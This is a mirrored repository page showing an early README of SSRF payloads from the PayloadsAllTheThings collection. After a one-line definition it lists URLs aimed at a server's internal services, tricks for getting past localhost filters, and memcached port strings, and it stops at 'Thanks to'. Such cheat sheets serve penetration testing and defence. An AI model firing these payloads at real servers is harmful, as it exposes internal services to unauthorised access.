Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 23:02:46 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/SSRF injection
History
swisskyrepo bb238f7301 Minor Updates in SQL-SSRF-XSS
2017-01-07 20:51:47 +01:00
..
README.md Minor Updates in SQL-SSRF-XSS 2017-01-07 20:51:47 +01:00

README.md

Server-Side Request Forgery

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.

Exploit

Basic SSRF v1

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22

Basic SSRF v2

http://localhost:80
http://localhost:443
http://localhost:22

Bypass localhost with [::]

http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid

Bypass localhost with a domain redirecting to locahost

http://n-pn.info

-> 11211 localhost:+11211aaa localhost:00011211aaaa

Thanks to